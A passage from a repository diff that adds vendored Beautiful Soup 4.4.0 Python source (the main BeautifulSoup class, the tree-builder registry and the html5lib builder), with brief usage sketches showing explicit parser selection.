"The Screen-Scraper's Friend"
http://www.crummy.com/software/BeautifulSoup/

Beautiful Soup uses a pluggable XML or HTML parser to parse a
(possibly invalid) document into a tree representation. Beautiful Soup
provides methods and Pythonic idioms that make it easy to
navigate, search, and modify the parse tree.

Beautiful Soup works with Python 2.6 and up. It works better if lxml
and/or html5lib is installed.

For more than you ever wanted to know about Beautiful Soup, see the
documentation:
http://www.crummy.com/software/BeautifulSoup/bs4/doc/
"""

__author__ = "Leonard Richardson (leonardr@segfault.org)"
__version__ = "4.4.0"
__copyright__ = "Copyright (c) 2004-2015 Leonard Richardson"
__license__ = "MIT"

__all__ = ['BeautifulSoup']

import os
import re
import warnings

from .builder import builder_registry, ParserRejectedMarkup
from .dammit import UnicodeDammit
from .element import (
    CData,
    Comment,
    DEFAULT_OUTPUT_ENCODING,
    Declaration,
    Doctype,
    NavigableString,
    PageElement,
    ProcessingInstruction,
    ResultSet,
    SoupStrainer,
    Tag,
    )

# The very first thing we do is give a useful error if someone is
# running this code under Python 3 without converting it.
'You are trying to run the Python 2 version of Beautiful Soup under Python 3. This will not work.'<>'You need to convert the code, either by installing it (`python setup.py install`) or by running 2to3 (`2to3 -w bs4`).'

class BeautifulSoup(Tag):
    """
    This class defines the basic interface called by the tree builders.

    These methods will be called by the parser:
      reset()
      feed(markup)

    The tree builder may call these methods from its feed() implementation:
      handle_starttag(name, attrs) # See note about return value
      handle_endtag(name)
      handle_data(data) # Appends to the current data node
      endData(containerClass=NavigableString) # Ends the current data node

    No matter how complicated the underlying parser is, you should be
    able to build a tree using 'start tag' events, 'end tag' events,
    'data' events, and "done with data" events.

    If you encounter an empty-element tag (aka a self-closing tag,
    like HTML's <br> tag), call handle_starttag and then
    handle_endtag.
    """
    ROOT_TAG_NAME = u'[document]'

    # If the end-user gives no indication which tree builder they
    # want, look for one with these features.
    DEFAULT_BUILDER_FEATURES = ['html', 'fast']

    ASCII_SPACES = '\x20\x0a\x09\x0c\x0d'

    NO_PARSER_SPECIFIED_WARNING = "No parser was explicitly specified, so I'm using the best available %(markup_type)s parser for this system (\"%(parser)s\"). This usually isn't a problem, but if you run this code on another system, or in a different virtual environment, it may use a different parser and behave differently.\n\nTo get rid of this warning, change this:\n\n BeautifulSoup([your markup])\n\nto this:\n\n BeautifulSoup([your markup], \"%(parser)s\")\n"

    def __init__(self, markup="", features=None, builder=None,
                 parse_only=None, from_encoding=None, exclude_encodings=None,
                 **kwargs):
        """The Soup object is initialized as the 'root tag', and the
        provided markup (which can be a string or a file-like object)
        is fed into the underlying parser."""

        if 'convertEntities' in kwargs:
            warnings.warn(
                "BS4 does not respect the convertEntities argument to the "
                "BeautifulSoup constructor. Entities are always converted "
                "to Unicode characters.")

        if 'markupMassage' in kwargs:
            del kwargs['markupMassage']
            warnings.warn(
                "BS4 does not respect the markupMassage argument to the "
                "BeautifulSoup constructor. The tree builder is responsible "
                "for any necessary markup massage.")

        if 'smartQuotesTo' in kwargs:
            del kwargs['smartQuotesTo']
            warnings.warn(
                "BS4 does not respect the smartQuotesTo argument to the "
                "BeautifulSoup constructor. Smart quotes are always converted "
                "to Unicode characters.")

        if 'selfClosingTags' in kwargs:
            del kwargs['selfClosingTags']
            warnings.warn(
                "BS4 does not respect the selfClosingTags argument to the "
                "BeautifulSoup constructor. The tree builder is responsible "
                "for understanding self-closing tags.")

        if 'isHTML' in kwargs:
            del kwargs['isHTML']
            warnings.warn(
                "BS4 does not respect the isHTML argument to the "
                "BeautifulSoup constructor. Suggest you use "
                "features='lxml' for HTML and features='lxml-xml' for "
                "XML.")

        def deprecated_argument(old_name, new_name):
            if old_name in kwargs:
                warnings.warn(
                    'The "%s" argument to the BeautifulSoup constructor '
                    'has been renamed to "%s."' % (old_name, new_name))
                value = kwargs[old_name]
                del kwargs[old_name]
                return value
            return None

        parse_only = parse_only or deprecated_argument(
            "parseOnlyThese", "parse_only")

        from_encoding = from_encoding or deprecated_argument(
            "fromEncoding", "from_encoding")

        if len(kwargs) > 0:
            arg = kwargs.keys().pop()
            raise TypeError(
                "__init__() got an unexpected keyword argument '%s'" % arg)

        if builder is None:
            original_features = features
            if isinstance(features, basestring):
                features = [features]
            if features is None or len(features) == 0:
                features = self.DEFAULT_BUILDER_FEATURES
            builder_class = builder_registry.lookup(*features)
            if builder_class is None:
                raise FeatureNotFound(
                    "Couldn't find a tree builder with the features you "
                    "requested: %s. Do you need to install a parser library?"
                    % ",".join(features))
            builder = builder_class()
            if not (original_features == builder.NAME or
                    original_features in builder.ALTERNATE_NAMES):
                if builder.is_xml:
                    markup_type = "XML"
                else:
                    markup_type = "HTML"
                warnings.warn(self.NO_PARSER_SPECIFIED_WARNING % dict(
                    parser=builder.NAME,
                    markup_type=markup_type))

        self.builder = builder
        self.is_xml = builder.is_xml
        self.builder.soup = self

        self.parse_only = parse_only

        if hasattr(markup, 'read'):        # It's a file-type object.
            markup = markup.read()
        elif len(markup) <= 256:
            # Print out warnings for a couple beginner problems
            # involving passing non-markup to Beautiful Soup.
            # Beautiful Soup will still parse the input as markup,
            # just in case that's what the user really wants.
            if (isinstance(markup, unicode)
                and not os.path.supports_unicode_filenames):
                possible_filename = markup.encode("utf8")
            else:
                possible_filename = markup
            is_file = False
            try:
                is_file = os.path.exists(possible_filename)
            except Exception, e:
                # This is almost certainly a problem involving
                # characters not valid in filenames on this
                # system. Just let it go.
                pass
            if is_file:
                if isinstance(markup, unicode):
                    markup = markup.encode("utf8")
                warnings.warn(
                    '"%s" looks like a filename, not markup. You should probably open this file and pass the filehandle into Beautiful Soup.' % markup)
            if markup[:5] == "http:" or markup[:6] == "https:":
                # TODO: This is ugly but I couldn't get it to work in
                # Python 3 otherwise.
                if ((isinstance(markup, bytes) and not b' ' in markup)
                    or (isinstance(markup, unicode) and not u' ' in markup)):
                    if isinstance(markup, unicode):
                        markup = markup.encode("utf8")
                    warnings.warn(
                        '"%s" looks like a URL. Beautiful Soup is not an HTTP client. You should probably use an HTTP client to get the document behind the URL, and feed that document to Beautiful Soup.' % markup)

        for (self.markup, self.original_encoding, self.declared_html_encoding,
             self.contains_replacement_characters) in (
            self.builder.prepare_markup(
                markup, from_encoding, exclude_encodings=exclude_encodings)):
            self.reset()
            try:
                self._feed()
                break
            except ParserRejectedMarkup:
                pass

        # Clear out the markup and remove the builder's circular
        # reference to this object.
        self.markup = None
        self.builder.soup = None

    def __copy__(self):
        return type(self)(self.encode(), builder=self.builder)

    def __getstate__(self):
        # Frequently a tree builder can't be pickled.
        d = dict(self.__dict__)
        if 'builder' in d and not self.builder.picklable:
            del d['builder']
        return d

    def _feed(self):
        # Convert the document to Unicode.
        self.builder.reset()

        self.builder.feed(self.markup)
        # Close out any unfinished strings and close all the open tags.
        self.endData()
        while self.currentTag.name != self.ROOT_TAG_NAME:
            self.popTag()

    def reset(self):
        Tag.__init__(self, self, self.builder, self.ROOT_TAG_NAME)
        self.hidden = 1
        self.builder.reset()
        self.current_data = []
        self.currentTag = None
        self.tagStack = []
        self.preserve_whitespace_tag_stack = []
        self.pushTag(self)

    def new_tag(self, name, namespace=None, nsprefix=None, **attrs):
        """Create a new tag associated with this soup."""
        return Tag(None, self.builder, name, namespace, nsprefix, attrs)

    def new_string(self, s, subclass=NavigableString):
        """Create a new NavigableString associated with this soup."""
        return subclass(s)

    def insert_before(self, successor):
        raise NotImplementedError("BeautifulSoup objects don't support insert_before().")

    def insert_after(self, successor):
        raise NotImplementedError("BeautifulSoup objects don't support insert_after().")

    def popTag(self):
        tag = self.tagStack.pop()
        if self.preserve_whitespace_tag_stack and tag == self.preserve_whitespace_tag_stack[-1]:
            self.preserve_whitespace_tag_stack.pop()
        #print "Pop", tag.name
        if self.tagStack:
            self.currentTag = self.tagStack[-1]
        return self.currentTag

    def pushTag(self, tag):
        #print "Push", tag.name
        if self.currentTag:
            self.currentTag.contents.append(tag)
        self.tagStack.append(tag)
        self.currentTag = self.tagStack[-1]
        if tag.name in self.builder.preserve_whitespace_tags:
            self.preserve_whitespace_tag_stack.append(tag)

    def endData(self, containerClass=NavigableString):
        if self.current_data:
            current_data = u''.join(self.current_data)
            # If whitespace is not preserved, and this string contains
            # nothing but ASCII spaces, replace it with a single space
            # or newline.
            if not self.preserve_whitespace_tag_stack:
                strippable = True
                for i in current_data:
                    if i not in self.ASCII_SPACES:
                        strippable = False
                        break
                if strippable:
                    if '\n' in current_data:
                        current_data = '\n'
                    else:
                        current_data = ' '

            # Reset the data collector.
            self.current_data = []

            # Should we add this string to the tree at all?
            if self.parse_only and len(self.tagStack) <= 1 and \
                   (not self.parse_only.text or \
                    not self.parse_only.search(current_data)):
                return

            o = containerClass(current_data)
            self.object_was_parsed(o)

    def object_was_parsed(self, o, parent=None, most_recent_element=None):
        """Add an object to the parse tree."""
        parent = parent or self.currentTag
        previous_element = most_recent_element or self._most_recent_element

        next_element = previous_sibling = next_sibling = None
        if isinstance(o, Tag):
            next_element = o.next_element
            next_sibling = o.next_sibling
            previous_sibling = o.previous_sibling
            if not previous_element:
                previous_element = o.previous_element

        o.setup(parent, previous_element, next_element, previous_sibling, next_sibling)

        self._most_recent_element = o
        parent.contents.append(o)

        if parent.next_sibling:
            # This node is being inserted into an element that has
            # already been parsed. Deal with any dangling references.
            index = parent.contents.index(o)
            if index == 0:
                previous_element = parent
                previous_sibling = None
            else:
                previous_element = previous_sibling = parent.contents[index-1]
            if index == len(parent.contents)-1:
                next_element = parent.next_sibling
                next_sibling = None
            else:
                next_element = next_sibling = parent.contents[index+1]

            o.previous_element = previous_element
            if previous_element:
                previous_element.next_element = o
            o.next_element = next_element
            if next_element:
                next_element.previous_element = o
            o.next_sibling = next_sibling
            if next_sibling:
                next_sibling.previous_sibling = o
            o.previous_sibling = previous_sibling
            if previous_sibling:
                previous_sibling.next_sibling = o

    def _popToTag(self, name, nsprefix=None, inclusivePop=True):
        """Pops the tag stack up to and including the most recent
        instance of the given tag. If inclusivePop is false, pops the tag
        stack up to but *not* including the most recent instance of
        the given tag."""
        #print "Popping to %s" % name
        if name == self.ROOT_TAG_NAME:
            # The BeautifulSoup object itself can never be popped.
            return

        most_recently_popped = None

        stack_size = len(self.tagStack)
        for i in range(stack_size - 1, 0, -1):
            t = self.tagStack[i]
            if (name == t.name and nsprefix == t.prefix):
                if inclusivePop:
                    most_recently_popped = self.popTag()
                break
            most_recently_popped = self.popTag()

        return most_recently_popped

    def handle_starttag(self, name, namespace, nsprefix, attrs):
        """Push a start tag on to the stack.

        If this method returns None, the tag was rejected by the
        SoupStrainer. You should proceed as if the tag had not occurred
        in the document. For instance, if this was a self-closing tag,
        don't call handle_endtag.
        """

        # print "Start tag %s: %s" % (name, attrs)
        self.endData()

        if (self.parse_only and len(self.tagStack) <= 1
            and (self.parse_only.text
                 or not self.parse_only.search_tag(name, attrs))):
            return None

        tag = Tag(self, self.builder, name, namespace, nsprefix, attrs,
                  self.currentTag, self._most_recent_element)
        if tag is None:
            return tag
        if self._most_recent_element:
            self._most_recent_element.next_element = tag
        self._most_recent_element = tag
        self.pushTag(tag)
        return tag

    def handle_endtag(self, name, nsprefix=None):
        #print "End tag: " + name
        self.endData()
        self._popToTag(name, nsprefix)

    def handle_data(self, data):
        self.current_data.append(data)

    def decode(self, pretty_print=False,
               eventual_encoding=DEFAULT_OUTPUT_ENCODING,
               formatter="minimal"):
        """Returns a string or Unicode representation of this document.
        To get Unicode, pass None for encoding."""

        if self.is_xml:
            # Print the XML declaration
            encoding_part = ''
            if eventual_encoding != None:
                encoding_part = ' encoding="%s"' % eventual_encoding
            prefix = u'<?xml version="1.0"%s?>\n' % encoding_part
        else:
            prefix = u''
        if not pretty_print:
            indent_level = None
        else:
            indent_level = 0
        return prefix + super(BeautifulSoup, self).decode(
            indent_level, eventual_encoding, formatter)

# Alias to make it easier to type import: 'from bs4 import _soup'
_s = BeautifulSoup
_soup = BeautifulSoup

class BeautifulStoneSoup(BeautifulSoup):
    """Deprecated interface to an XML parser."""

    def __init__(self, *args, **kwargs):
        kwargs['features'] = 'xml'
        warnings.warn(
            'The BeautifulStoneSoup class is deprecated. Instead of using '
            'it, pass features="xml" into the BeautifulSoup constructor.')
        super(BeautifulStoneSoup, self).__init__(*args, **kwargs)


class StopParsing(Exception):
    pass

class FeatureNotFound(ValueError):
    pass


#By default, act as an HTML pretty-printer.
if __name__ == '__main__':
    import sys
    soup = BeautifulSoup(sys.stdin)
    print soup.prettify()
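A quick usage sketch for the vendored module above: passing an explicit parser name to the constructor avoids the NO_PARSER_SPECIFIED_WARNING path in __init__ (Python 2 syntax, matching the vendored code).

# Minimal BeautifulSoup usage, parser named explicitly.
from bs4 import BeautifulSoup

soup = BeautifulSoup("<html><body><a href='/x'>link</a></body></html>",
                     "html.parser")
for a in soup.find_all("a"):
    print a.get("href")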
324
PortalAuth/includes/scripts/libs/bs4/builder/__init__.py
Executable file
@@ -0,0 +1,324 @@
from collections import defaultdict
import itertools
import sys
from bs4.element import (
    CharsetMetaAttributeValue,
    ContentMetaAttributeValue,
    whitespace_re
    )

__all__ = [
    'HTMLTreeBuilder',
    'SAXTreeBuilder',
    'TreeBuilder',
    'TreeBuilderRegistry',
    ]

# Some useful features for a TreeBuilder to have.
FAST = 'fast'
PERMISSIVE = 'permissive'
STRICT = 'strict'
XML = 'xml'
HTML = 'html'
HTML_5 = 'html5'


class TreeBuilderRegistry(object):

    def __init__(self):
        self.builders_for_feature = defaultdict(list)
        self.builders = []

    def register(self, treebuilder_class):
        """Register a treebuilder based on its advertised features."""
        for feature in treebuilder_class.features:
            self.builders_for_feature[feature].insert(0, treebuilder_class)
        self.builders.insert(0, treebuilder_class)

    def lookup(self, *features):
        if len(self.builders) == 0:
            # There are no builders at all.
            return None

        if len(features) == 0:
            # They didn't ask for any features. Give them the most
            # recently registered builder.
            return self.builders[0]

        # Go down the list of features in order, and eliminate any builders
        # that don't match every feature.
        features = list(features)
        features.reverse()
        candidates = None
        candidate_set = None
        while len(features) > 0:
            feature = features.pop()
            we_have_the_feature = self.builders_for_feature.get(feature, [])
            if len(we_have_the_feature) > 0:
                if candidates is None:
                    candidates = we_have_the_feature
                    candidate_set = set(candidates)
                else:
                    # Eliminate any candidates that don't have this feature.
                    candidate_set = candidate_set.intersection(
                        set(we_have_the_feature))

        # The only valid candidates are the ones in candidate_set.
        # Go through the original list of candidates and pick the first one
        # that's in candidate_set.
        if candidate_set is None:
            return None
        for candidate in candidates:
            if candidate in candidate_set:
                return candidate
        return None

# The BeautifulSoup class will take feature lists from developers and use them
# to look up builders in this registry.
builder_registry = TreeBuilderRegistry()

class TreeBuilder(object):
    """Turn a document into a Beautiful Soup object tree."""

    NAME = "[Unknown tree builder]"
    ALTERNATE_NAMES = []
    features = []

    is_xml = False
    picklable = False
    preserve_whitespace_tags = set()
    empty_element_tags = None # A tag will be considered an empty-element
                              # tag when and only when it has no contents.

    # A value for these tag/attribute combinations is a space- or
    # comma-separated list of CDATA, rather than a single CDATA.
    cdata_list_attributes = {}


    def __init__(self):
        self.soup = None

    def reset(self):
        pass

    def can_be_empty_element(self, tag_name):
        """Might a tag with this name be an empty-element tag?

        The final markup may or may not actually present this tag as
        self-closing.

        For instance: an HTMLBuilder does not consider a <p> tag to be
        an empty-element tag (it's not in
        HTMLBuilder.empty_element_tags). This means an empty <p> tag
        will be presented as "<p></p>", not "<p />".

        The default implementation has no opinion about which tags are
        empty-element tags, so a tag will be presented as an
        empty-element tag if and only if it has no contents.
        "<foo></foo>" will become "<foo />", and "<foo>bar</foo>" will
        be left alone.
        """
        if self.empty_element_tags is None:
            return True
        return tag_name in self.empty_element_tags

    def feed(self, markup):
        raise NotImplementedError()

    def prepare_markup(self, markup, user_specified_encoding=None,
                       document_declared_encoding=None):
        return markup, None, None, False

    def test_fragment_to_document(self, fragment):
        """Wrap an HTML fragment to make it look like a document.

        Different parsers do this differently. For instance, lxml
        introduces an empty <head> tag, and html5lib
        doesn't. Abstracting this away lets us write simple tests
        which run HTML fragments through the parser and compare the
        results against other HTML fragments.

        This method should not be used outside of tests.
        """
        return fragment

    def set_up_substitutions(self, tag):
        return False

    def _replace_cdata_list_attribute_values(self, tag_name, attrs):
        """Replaces class="foo bar" with class=["foo", "bar"]

        Modifies its input in place.
        """
        if not attrs:
            return attrs
        if self.cdata_list_attributes:
            universal = self.cdata_list_attributes.get('*', [])
            tag_specific = self.cdata_list_attributes.get(
                tag_name.lower(), None)
            for attr in attrs.keys():
                if attr in universal or (tag_specific and attr in tag_specific):
                    # We have a "class"-type attribute whose string
                    # value is a whitespace-separated list of
                    # values. Split it into a list.
                    value = attrs[attr]
                    if isinstance(value, basestring):
                        values = whitespace_re.split(value)
                    else:
                        # html5lib sometimes calls setAttributes twice
                        # for the same tag when rearranging the parse
                        # tree. On the second call the attribute value
                        # here is already a list. If this happens,
                        # leave the value alone rather than trying to
                        # split it again.
                        values = value
                    attrs[attr] = values
        return attrs

class SAXTreeBuilder(TreeBuilder):
    """A Beautiful Soup treebuilder that listens for SAX events."""

    def feed(self, markup):
        raise NotImplementedError()

    def close(self):
        pass

    def startElement(self, name, attrs):
        attrs = dict((key[1], value) for key, value in list(attrs.items()))
        #print "Start %s, %r" % (name, attrs)
        self.soup.handle_starttag(name, attrs)

    def endElement(self, name):
        #print "End %s" % name
        self.soup.handle_endtag(name)

    def startElementNS(self, nsTuple, nodeName, attrs):
        # Throw away (ns, nodeName) for now.
        self.startElement(nodeName, attrs)

    def endElementNS(self, nsTuple, nodeName):
        # Throw away (ns, nodeName) for now.
        self.endElement(nodeName)
        #handler.endElementNS((ns, node.nodeName), node.nodeName)

    def startPrefixMapping(self, prefix, nodeValue):
        # Ignore the prefix for now.
        pass

    def endPrefixMapping(self, prefix):
        # Ignore the prefix for now.
        # handler.endPrefixMapping(prefix)
        pass

    def characters(self, content):
        self.soup.handle_data(content)

    def startDocument(self):
        pass

    def endDocument(self):
        pass


class HTMLTreeBuilder(TreeBuilder):
    """This TreeBuilder knows facts about HTML.

    Such as which tags are empty-element tags.
    """

    preserve_whitespace_tags = set(['pre', 'textarea'])
    empty_element_tags = set(['br' , 'hr', 'input', 'img', 'meta',
                              'spacer', 'link', 'frame', 'base'])

    # The HTML standard defines these attributes as containing a
    # space-separated list of values, not a single value. That is,
    # class="foo bar" means that the 'class' attribute has two values,
    # 'foo' and 'bar', not the single value 'foo bar'. When we
    # encounter one of these attributes, we will parse its value into
    # a list of values if possible. Upon output, the list will be
    # converted back into a string.
    cdata_list_attributes = {
        "*" : ['class', 'accesskey', 'dropzone'],
        "a" : ['rel', 'rev'],
        "link" : ['rel', 'rev'],
        "td" : ["headers"],
        "th" : ["headers"],
        "td" : ["headers"],
        "form" : ["accept-charset"],
        "object" : ["archive"],

        # These are HTML5 specific, as are *.accesskey and *.dropzone above.
        "area" : ["rel"],
        "icon" : ["sizes"],
        "iframe" : ["sandbox"],
        "output" : ["for"],
        }

    def set_up_substitutions(self, tag):
        # We are only interested in <meta> tags
        if tag.name != 'meta':
            return False

        http_equiv = tag.get('http-equiv')
        content = tag.get('content')
        charset = tag.get('charset')

        # We are interested in <meta> tags that say what encoding the
        # document was originally in. This means HTML 5-style <meta>
        # tags that provide the "charset" attribute. It also means
        # HTML 4-style <meta> tags that provide the "content"
        # attribute and have "http-equiv" set to "content-type".
        #
        # In both cases we will replace the value of the appropriate
        # attribute with a standin object that can take on any
        # encoding.
        meta_encoding = None
        if charset is not None:
            # HTML 5 style:
            # <meta charset="utf8">
            meta_encoding = charset
            tag['charset'] = CharsetMetaAttributeValue(charset)

        elif (content is not None and http_equiv is not None
              and http_equiv.lower() == 'content-type'):
            # HTML 4 style:
            # <meta http-equiv="content-type" content="text/html; charset=utf8">
            tag['content'] = ContentMetaAttributeValue(content)

        return (meta_encoding is not None)

def register_treebuilders_from(module):
    """Copy TreeBuilders from the given module into this module."""
    # I'm fairly sure this is not the best way to do this.
    this_module = sys.modules['bs4.builder']
    for name in module.__all__:
        obj = getattr(module, name)

        if issubclass(obj, TreeBuilder):
            setattr(this_module, name, obj)
            this_module.__all__.append(name)
            # Register the builder while we're at it.
            this_module.builder_registry.register(obj)

class ParserRejectedMarkup(Exception):
    pass

# Builders are registered in reverse order of priority, so that custom
# builder registrations will take precedence. In general, we want lxml
# to take precedence over html5lib, because it's faster. And we only
# want to use HTMLParser as a last resort.
from . import _htmlparser
register_treebuilders_from(_htmlparser)
try:
    from . import _html5lib
    register_treebuilders_from(_html5lib)
except ImportError:
    # They don't have html5lib installed.
    pass
try:
    from . import _lxml
    register_treebuilders_from(_lxml)
except ImportError:
    # They don't have lxml installed.
    pass
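A sketch of how the feature lookup above resolves a parser: register() inserts at the front of each feature list, and lookup() takes the first surviving candidate, so the most recently registered builder with every requested feature wins (which is why lxml, registered last, beats html.parser for 'html'). Python 2 syntax, matching the vendored code.

# Resolving a tree builder by feature through the registry.
from bs4.builder import builder_registry

builder_class = builder_registry.lookup('html', 'fast')
if builder_class is None:
    raise RuntimeError("no tree builder with the requested features")
builder = builder_class()
print builder.NAME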
329
PortalAuth/includes/scripts/libs/bs4/builder/_html5lib.py
Executable file
@@ -0,0 +1,329 @@
__all__ = [
    'HTML5TreeBuilder',
    ]

from pdb import set_trace
import warnings
from bs4.builder import (
    PERMISSIVE,
    HTML,
    HTML_5,
    HTMLTreeBuilder,
    )
from bs4.element import (
    NamespacedAttribute,
    whitespace_re,
)
import html5lib
from html5lib.constants import namespaces
from bs4.element import (
    Comment,
    Doctype,
    NavigableString,
    Tag,
    )

class HTML5TreeBuilder(HTMLTreeBuilder):
    """Use html5lib to build a tree."""

    NAME = "html5lib"

    features = [NAME, PERMISSIVE, HTML_5, HTML]

    def prepare_markup(self, markup, user_specified_encoding,
                       document_declared_encoding=None, exclude_encodings=None):
        # Store the user-specified encoding for use later on.
        self.user_specified_encoding = user_specified_encoding

        # document_declared_encoding and exclude_encodings aren't used
        # ATM because the html5lib TreeBuilder doesn't use
        # UnicodeDammit.
        if exclude_encodings:
            warnings.warn("You provided a value for exclude_encoding, but the html5lib tree builder doesn't support exclude_encoding.")
        yield (markup, None, None, False)

    # These methods are defined by Beautiful Soup.
    def feed(self, markup):
        if self.soup.parse_only is not None:
            warnings.warn("You provided a value for parse_only, but the html5lib tree builder doesn't support parse_only. The entire document will be parsed.")
        parser = html5lib.HTMLParser(tree=self.create_treebuilder)
        doc = parser.parse(markup, encoding=self.user_specified_encoding)

        # Set the character encoding detected by the tokenizer.
        if isinstance(markup, unicode):
            # We need to special-case this because html5lib sets
            # charEncoding to UTF-8 if it gets Unicode input.
            doc.original_encoding = None
        else:
            doc.original_encoding = parser.tokenizer.stream.charEncoding[0]

    def create_treebuilder(self, namespaceHTMLElements):
        self.underlying_builder = TreeBuilderForHtml5lib(
            self.soup, namespaceHTMLElements)
        return self.underlying_builder

    def test_fragment_to_document(self, fragment):
        """See `TreeBuilder`."""
        return u'<html><head></head><body>%s</body></html>' % fragment


class TreeBuilderForHtml5lib(html5lib.treebuilders._base.TreeBuilder):

    def __init__(self, soup, namespaceHTMLElements):
        self.soup = soup
        super(TreeBuilderForHtml5lib, self).__init__(namespaceHTMLElements)

    def documentClass(self):
        self.soup.reset()
        return Element(self.soup, self.soup, None)

    def insertDoctype(self, token):
        name = token["name"]
        publicId = token["publicId"]
        systemId = token["systemId"]

        doctype = Doctype.for_name_and_ids(name, publicId, systemId)
        self.soup.object_was_parsed(doctype)

    def elementClass(self, name, namespace):
        tag = self.soup.new_tag(name, namespace)
        return Element(tag, self.soup, namespace)

    def commentClass(self, data):
        return TextNode(Comment(data), self.soup)

    def fragmentClass(self):
        self.soup = BeautifulSoup("")
        self.soup.name = "[document_fragment]"
        return Element(self.soup, self.soup, None)

    def appendChild(self, node):
        # XXX This code is not covered by the BS4 tests.
        self.soup.append(node.element)

    def getDocument(self):
        return self.soup

    def getFragment(self):
        return html5lib.treebuilders._base.TreeBuilder.getFragment(self).element

class AttrList(object):
    def __init__(self, element):
        self.element = element
        self.attrs = dict(self.element.attrs)
    def __iter__(self):
        return list(self.attrs.items()).__iter__()
    def __setitem__(self, name, value):
        # If this attribute is a multi-valued attribute for this element,
        # turn its value into a list.
        list_attr = HTML5TreeBuilder.cdata_list_attributes
        if (name in list_attr['*']
            or (self.element.name in list_attr
                and name in list_attr[self.element.name])):
            value = whitespace_re.split(value)
        self.element[name] = value
    def items(self):
        return list(self.attrs.items())
    def keys(self):
        return list(self.attrs.keys())
    def __len__(self):
        return len(self.attrs)
    def __getitem__(self, name):
        return self.attrs[name]
    def __contains__(self, name):
        return name in list(self.attrs.keys())


class Element(html5lib.treebuilders._base.Node):
    def __init__(self, element, soup, namespace):
        html5lib.treebuilders._base.Node.__init__(self, element.name)
        self.element = element
        self.soup = soup
        self.namespace = namespace

    def appendChild(self, node):
        string_child = child = None
        if isinstance(node, basestring):
            # Some other piece of code decided to pass in a string
            # instead of creating a TextElement object to contain the
            # string.
            string_child = child = node
        elif isinstance(node, Tag):
            # Some other piece of code decided to pass in a Tag
            # instead of creating an Element object to contain the
            # Tag.
            child = node
        elif node.element.__class__ == NavigableString:
            string_child = child = node.element
        else:
            child = node.element

        if not isinstance(child, basestring) and child.parent is not None:
            node.element.extract()

        if (string_child and self.element.contents
            and self.element.contents[-1].__class__ == NavigableString):
            # We are appending a string onto another string.
            # TODO This has O(n^2) performance, for input like
            # "a</a>a</a>a</a>..."
            old_element = self.element.contents[-1]
            new_element = self.soup.new_string(old_element + string_child)
            old_element.replace_with(new_element)
            self.soup._most_recent_element = new_element
        else:
            if isinstance(node, basestring):
                # Create a brand new NavigableString from this string.
                child = self.soup.new_string(node)

            # Tell Beautiful Soup to act as if it parsed this element
            # immediately after the parent's last descendant. (Or
            # immediately after the parent, if it has no children.)
            if self.element.contents:
                most_recent_element = self.element._last_descendant(False)
            elif self.element.next_element is not None:
                # Something from further ahead in the parse tree is
                # being inserted into this earlier element. This is
                # very annoying because it means an expensive search
                # for the last element in the tree.
                most_recent_element = self.soup._last_descendant()
            else:
                most_recent_element = self.element

            self.soup.object_was_parsed(
                child, parent=self.element,
                most_recent_element=most_recent_element)

    def getAttributes(self):
        return AttrList(self.element)

    def setAttributes(self, attributes):

        if attributes is not None and len(attributes) > 0:

            converted_attributes = []
            for name, value in list(attributes.items()):
                if isinstance(name, tuple):
                    new_name = NamespacedAttribute(*name)
                    del attributes[name]
                    attributes[new_name] = value

            self.soup.builder._replace_cdata_list_attribute_values(
                self.name, attributes)
            for name, value in attributes.items():
                self.element[name] = value

            # The attributes may contain variables that need substitution.
            # Call set_up_substitutions manually.
            #
            # The Tag constructor called this method when the Tag was created,
            # but we just set/changed the attributes, so call it again.
            self.soup.builder.set_up_substitutions(self.element)
    attributes = property(getAttributes, setAttributes)

    def insertText(self, data, insertBefore=None):
        if insertBefore:
            text = TextNode(self.soup.new_string(data), self.soup)
            self.insertBefore(data, insertBefore)
        else:
            self.appendChild(data)

    def insertBefore(self, node, refNode):
        index = self.element.index(refNode.element)
        if (node.element.__class__ == NavigableString and self.element.contents
            and self.element.contents[index-1].__class__ == NavigableString):
            # (See comments in appendChild)
            old_node = self.element.contents[index-1]
            new_str = self.soup.new_string(old_node + node.element)
            old_node.replace_with(new_str)
        else:
            self.element.insert(index, node.element)
            node.parent = self

    def removeChild(self, node):
        node.element.extract()

    def reparentChildren(self, new_parent):
        """Move all of this tag's children into another tag."""
        # print "MOVE", self.element.contents
        # print "FROM", self.element
        # print "TO", new_parent.element
        element = self.element
        new_parent_element = new_parent.element
        # Determine what this tag's next_element will be once all the children
        # are removed.
        final_next_element = element.next_sibling

        new_parents_last_descendant = new_parent_element._last_descendant(False, False)
        if len(new_parent_element.contents) > 0:
            # The new parent already contains children. We will be
            # appending this tag's children to the end.
            new_parents_last_child = new_parent_element.contents[-1]
            new_parents_last_descendant_next_element = new_parents_last_descendant.next_element
        else:
            # The new parent contains no children.
            new_parents_last_child = None
            new_parents_last_descendant_next_element = new_parent_element.next_element

        to_append = element.contents
        append_after = new_parent_element.contents
        if len(to_append) > 0:
            # Set the first child's previous_element and previous_sibling
            # to elements within the new parent
            first_child = to_append[0]
            if new_parents_last_descendant:
                first_child.previous_element = new_parents_last_descendant
            else:
                first_child.previous_element = new_parent_element
            first_child.previous_sibling = new_parents_last_child
            if new_parents_last_descendant:
                new_parents_last_descendant.next_element = first_child
            else:
                new_parent_element.next_element = first_child
            if new_parents_last_child:
                new_parents_last_child.next_sibling = first_child

            # Fix the last child's next_element and next_sibling
            last_child = to_append[-1]
            last_child.next_element = new_parents_last_descendant_next_element
            if new_parents_last_descendant_next_element:
                new_parents_last_descendant_next_element.previous_element = last_child
            last_child.next_sibling = None

        for child in to_append:
            child.parent = new_parent_element
            new_parent_element.contents.append(child)

        # Now that this element has no children, change its .next_element.
        element.contents = []
        element.next_element = final_next_element

        # print "DONE WITH MOVE"
        # print "FROM", self.element
        # print "TO", new_parent_element

    def cloneNode(self):
        tag = self.soup.new_tag(self.element.name, self.namespace)
        node = Element(tag, self.soup, self.namespace)
        for key,value in self.attributes:
            node.attributes[key] = value
        return node

    def hasContent(self):
        return self.element.contents

    def getNameTuple(self):
        if self.namespace == None:
            return namespaces["html"], self.name
        else:
            return self.namespace, self.name

    nameTuple = property(getNameTuple)

class TextNode(Element):
    def __init__(self, element, soup):
        html5lib.treebuilders._base.Node.__init__(self, None)
        self.element = element
        self.soup = soup

    def cloneNode(self):
        raise NotImplementedError
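Selecting the builder above is done by name through the same registry mechanism; html5lib parses malformed markup the way browsers do, at the cost of speed, and requires the html5lib package to be importable. A short sketch (Python 2, matching the vendored code):

# Forcing the html5lib tree builder, which tolerates badly broken markup.
from bs4 import BeautifulSoup

soup = BeautifulSoup("<p>unclosed <b>markup", "html5lib")
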